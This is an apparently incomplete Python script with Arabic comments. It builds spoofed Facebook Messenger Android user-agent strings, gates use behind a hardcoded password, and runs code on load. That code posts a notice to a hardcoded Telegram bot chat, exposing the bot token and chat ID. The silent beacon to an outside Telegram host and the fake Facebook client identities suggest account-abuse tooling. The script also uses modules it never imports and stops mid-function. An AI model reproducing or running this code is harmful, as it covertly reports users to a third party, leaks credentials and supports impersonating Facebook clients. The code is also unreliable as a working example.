def m1():
    # قائمة من السلاسل النصية 
    user_agents = [
        "[FBAN/FB4A;FBAV/304.64.83.86;FBPN/com.facebook.orca;FBLC/en_US;FBBV/575123562;FBCR/Orange;FBMF/samsung;FBBD/samsung;FBDV/OnePlus 9 Pro;FBSV/11;FBCA/arm64-v8a:armeabi-v7a:armeabi;FBDM/{density=3.0,width=1440,height=2960};FB_FW/1;FBRV/249906499]",
        "[FBAN/FB4A;FBAV/275.35.76.35;FBPN/com.facebook.orca;FBLC/en_US;FBBV/727486760;FBCR/AT&T;FBMF/samsung;FBBD/samsung;FBDV/SM-G998U;FBSV/10;FBCA/arm64-v8a:armeabi-v7a:armeabi;FBDM/{density=3.0,width=1920,height=1920};FB_FW/1;FBRV/388766719]"
    ]

    # دمج السلاسل النصية في سلسلة واحدة 
    return ";".join(user_agents) 

# استخدام الدالة 
user_agent = m1()

# استخدم  user_agent  في طلبات API 
token = '7244277412:AAFUXBZ1SjvF-z0hUGrJW3tS5jd8ropROVI'
ID = '5210419138'
message = "خش واحد لي اداة" 

headers = {'User-Agent': user_agent}
requests.post(f'https://api.telegram.org/bot{token}/sendMessage?chat_id={ID}&text={message}', headers=headers)
def m2():
    ua  = "[FBAN/Orca-Android;FBAV/" + str(random.randint(196,214)) + ".0.0." + str(random.randrange(33,66)) + ";FBBV/" + str(random.randint(111111111,999999999)) + ";[FBAN/Orca-Android;FBAV/137.50.75.81;FBPN/com.facebook.orca;FBLC/en_US;FBBV/22062473;FBCR/T-Mobile;FBMF/Realme;FBBD/Realme;FBDV/GALAXY S24 ULTRA;FBSV/9.2;FBCA/arm64-v8a;FBDM/{density=3.7,width=979,height=1744};FB_FW/1;FBRV/71559308]"
    return ua
password = "jako"  # كلمة السر الصحيحة

while True:
  user_password = input("أدخل كلمة السر: ")  # طلب كلمة السر من المستخدم

  if user_password == password:
    print("تم تسجيل الدخول بنجاح!")
    break  # الخروج من الحلقة إذا كانت كلمة السر صحيحة
  else:
    print("كلمة السر خاطئة. حاول مرة أخرى.")
def sexy():
    session=requests.session()
        
    bot_token = '7244277412:AAFUXBZ1SjvF-z0hUGrJW3tS5jd8ropROVI' 
    chat_id = '5210419138'
